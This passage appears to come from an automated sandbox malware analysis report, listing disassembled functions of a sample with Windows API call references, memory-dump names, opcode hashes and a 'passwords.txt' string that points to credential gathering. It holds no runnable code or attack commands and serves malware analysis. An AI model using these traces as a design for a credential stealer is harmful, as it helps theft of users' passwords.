                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 75cf99f039a1e854ba8d590396a2eec3821c6c0c10bc203e0cfc231443454280
                                      • Instruction ID: 99e2ef522daf836b1bce5c768014d3f4db73f188b3255d3357107ea11911004c
                                      • Opcode Fuzzy Hash: 75cf99f039a1e854ba8d590396a2eec3821c6c0c10bc203e0cfc231443454280
                                      • Instruction Fuzzy Hash: 97F0FEB1C007199FCB54DFADD5415AEFBF4FB08220B10866ED46AE3640E631AA408B51
                                      Function 002F8AA0 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 250stringmemoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,02F45258,00000000,?,003101E0,00000000,?,?), ref: 002F8B6A
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 002F8B84
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 002F8B8D
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 002F8B9C
                                      • ??_U@YAPAXI@Z.MSVCRT(00000001), ref: 002F8BA6
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 002F8BB9
                                      • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 002F8BC6
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002F8BCD
                                      • StrStrA.SHLWAPI(00000000,02F45240), ref: 002F8BDD
                                      • StrStrA.SHLWAPI(-00000010,02F45300), ref: 002F8BFB
                                      • lstrcat.KERNEL32(00000000,02F433A8), ref: 002F8C0E
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F8C1E
                                      • lstrcat.KERNEL32(00000000,003134BC), ref: 002F8C2A
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F8C3A
                                      • lstrcat.KERNEL32(00000000,003134B8), ref: 002F8C46
                                      • lstrcat.KERNEL32(00000000,02F43258), ref: 002F8C54
                                      • lstrcat.KERNEL32(00000000,-00000010), ref: 002F8C5C
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002F8C68
                                      • StrStrA.SHLWAPI(00000000,02F45620), ref: 002F8C79
                                      • StrStrA.SHLWAPI(00000014,02F455C0), ref: 002F8C89
                                      • lstrcat.KERNEL32(00000000,02F43348), ref: 002F8C9D
                                        • Part of subcall function 002F8980: memset.MSVCRT ref: 002F89A9
                                        • Part of subcall function 002F8980: lstrlen.KERNEL32(?,00000001,?,00001FA0,00000000,00000000), ref: 002F89C6
                                        • Part of subcall function 002F8980: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 002F89CE
                                        • Part of subcall function 002F8980: memcpy.MSVCRT(?,?,?), ref: 002F8A3A
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F8CAE
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002F8CBA
                                      • StrStrA.SHLWAPI(00000000,02F455C0), ref: 002F8CCB
                                      • StrStrA.SHLWAPI(00000014,02F432F8), ref: 002F8CDB
                                      • lstrcat.KERNEL32(00000000,02F45288), ref: 002F8CEF
                                        • Part of subcall function 002F8980: lstrcat.KERNEL32(003101E9,003101E9), ref: 002F8A6D
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F8D00
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002F8D0C
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002F8D18
                                      • StrStrA.SHLWAPI(00000000,02F45240), ref: 002F8D29
                                      • lstrlen.KERNEL32(00000000), ref: 002F8D3D
                                      • CloseHandle.KERNEL32(00000000), ref: 002F8D7A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$File$lstrcpy$lstrlen$HeapPointer$AllocateBinaryCloseCreateCryptHandleProcessReadSizeStringmemcpymemset
                                      • String ID: passwords.txt
                                      • API String ID: 2200313820-347816968
                                      • Opcode ID: 273e4f9af4366b4377b0d96faaac35545d35b7a36dc04c4ec1d83e510105ea3f
                                      • Instruction ID: 9f809882fe0c5e6c161006d043ffa95332314c883e066e18908492f44fd950e2
                                      • Opcode Fuzzy Hash: 273e4f9af4366b4377b0d96faaac35545d35b7a36dc04c4ec1d83e510105ea3f
                                      • Instruction Fuzzy Hash: 9881B471511108ABE715EB60DD59FFE777CAF25740F084134F606A22A1DF346A0ADB72
                                      Function 002FBF30 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 286stringfilememoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002FBFD7
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002FC00B
                                      • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 002FC069
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002FC070
                                      • lstrlen.KERNEL32(00000000,00000000), ref: 002FC10C
                                      • lstrcat.KERNEL32(00000000,02F433A8), ref: 002FC123
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002FC133
                                      • lstrcat.KERNEL32(00000000,003134BC), ref: 002FC13F
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002FC14F
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 003010F0: memset.MSVCRT ref: 0030110A
                                        • Part of subcall function 003010F0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,002F727B,?), ref: 0030113D
                                        • Part of subcall function 003010F0: RtlAllocateHeap.NTDLL(00000000), ref: 00301144
                                        • Part of subcall function 003010F0: wsprintfW.USER32 ref: 00301153
                                        • Part of subcall function 003010F0: OpenProcess.KERNEL32(00001001,00000000), ref: 003011BB
                                        • Part of subcall function 003010F0: TerminateProcess.KERNEL32(00000000,00000000), ref: 003011CA
                                        • Part of subcall function 003010F0: CloseHandle.KERNEL32(00000000), ref: 003011D1
                                      • lstrcat.KERNEL32(00000000,003134B8), ref: 002FC15B
                                      • lstrcat.KERNEL32(00000000,02F43258), ref: 002FC169
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002FC179
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002FC185
                                      • lstrcat.KERNEL32(00000000,02F43348), ref: 002FC192
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002FC1A2
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002FC1AE
                                      • lstrcat.KERNEL32(00000000,02F45288), ref: 002FC1BC
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002FC1CC
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002FC1D8
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002FC1E4
                                      • lstrlen.KERNEL32(00000000), ref: 002FC211
                                      • DeleteFileA.KERNEL32(00000000), ref: 002FC275
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$HeapProcess$Filelstrlen$AllocateCopy$CloseDeleteHandleOpenSystemTerminateTimememsetwsprintf
                                      • String ID: passwords.txt
                                      • API String ID: 1608474789-347816968
                                      • Opcode ID: 5bc452223e9c3a185eb19167d07096e59de2eed3cb226aa8b280067cfb77a3a9
                                      • Instruction ID: c84e2de02a85e8788919665564031d04e3c5f658302d1c3c4091010ec2d735da
                                      • Opcode Fuzzy Hash: 5bc452223e9c3a185eb19167d07096e59de2eed3cb226aa8b280067cfb77a3a9
                                      • Instruction Fuzzy Hash: 89A15471921109ABDB55EBA0DE5ADFE777CAF24381F048034F606A2291DF30AA19CF71
                                      Function 002F7160 Relevance: 32.0, APIs: 21, Instructions: 482stringfilememoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FFA20: StrCmpCA.SHLWAPI(?,?,?,002F7177,02F433D8), ref: 002FFA2A
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F725E
                                      • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 002F744B
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002F7452
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F7292
                                        • Part of subcall function 002FF8A0: lstrlen.KERNEL32(002F5B05,00000000,?,?,002F5B05,003101E9), ref: 002FF8AB
                                        • Part of subcall function 002FF8A0: lstrcpy.KERNEL32(00000000,002F5B05), ref: 002FF8E2
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F757D
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F7589
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F7599
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F75A5
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F75B5
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F75C1
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F75D1
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F75DD
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F75ED
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F75F9
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F7609
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F7615
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F7652
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002F7666
                                      • lstrlen.KERNEL32(00000000), ref: 002F76B3
                                      • lstrlen.KERNEL32(00000000), ref: 002F76BF
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • DeleteFileA.KERNEL32(00000000,?,003101E9), ref: 002F771A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$File$CopyHeap$AllocateDeleteProcess
                                      • String ID:
                                      • API String ID: 510441641-0
                                      • Opcode ID: 474a11158c3446556901cfc1109250434c38e90c6a3345bac49900e91c8c69df
                                      • Instruction ID: 536727428ba6ce4b428de2cf4cb65aed2702428c88ec65f703220d34a27329fd
                                      • Opcode Fuzzy Hash: 474a11158c3446556901cfc1109250434c38e90c6a3345bac49900e91c8c69df
                                      • Instruction Fuzzy Hash: 8102507192010DABDB55EBA0DE56DFEB738AF24380F144138F60676291EF306A69CF61
                                      Function 002F8DD0 Relevance: 31.9, APIs: 21, Instructions: 390stringfilememoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F8E75
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F8EAA
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 002F8FC9
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F90F3
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F90FF
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F910F
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F911B
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F912B
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F9137
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F9147
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F9153
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F9163
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F916F
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F917F
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F918B
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F919B
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002F91A7
                                      • lstrlen.KERNEL32(00000000), ref: 002F91FC
                                      • lstrlen.KERNEL32(00000000), ref: 002F9208
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002F8FD0
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 003010F0: memset.MSVCRT ref: 0030110A
                                        • Part of subcall function 003010F0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,002F727B,?), ref: 0030113D
                                        • Part of subcall function 003010F0: RtlAllocateHeap.NTDLL(00000000), ref: 00301144
                                        • Part of subcall function 003010F0: wsprintfW.USER32 ref: 00301153
                                        • Part of subcall function 003010F0: OpenProcess.KERNEL32(00001001,00000000), ref: 003011BB
                                        • Part of subcall function 003010F0: TerminateProcess.KERNEL32(00000000,00000000), ref: 003011CA
                                        • Part of subcall function 003010F0: CloseHandle.KERNEL32(00000000), ref: 003011D1
                                      • DeleteFileA.KERNEL32(00000000), ref: 002F9263
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$HeapProcess$Filelstrlen$AllocateCopy$CloseDeleteHandleOpenSystemTerminateTimememsetwsprintf
                                      • String ID:
                                      • API String ID: 1608474789-0
                                      • Opcode ID: 6ec03ae5ccf6045ecd91f22e4afab628e0fb9540f65921fcae4cccb9fcca2abb
                                      • Instruction ID: f117f48558a072fef151fcf90083457a06bfc5f8898dc660bb85e37686b5b55a
                                      • Opcode Fuzzy Hash: 6ec03ae5ccf6045ecd91f22e4afab628e0fb9540f65921fcae4cccb9fcca2abb
                                      • Instruction Fuzzy Hash: B7D1417192010DABDB55EBB0DE56DFEB778AF24780F144138F60672291EF206A29CF61
                                      Function 002F3E20 Relevance: 30.2, APIs: 13, Strings: 4, Instructions: 457networkfilestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00000001), ref: 002F3DA2
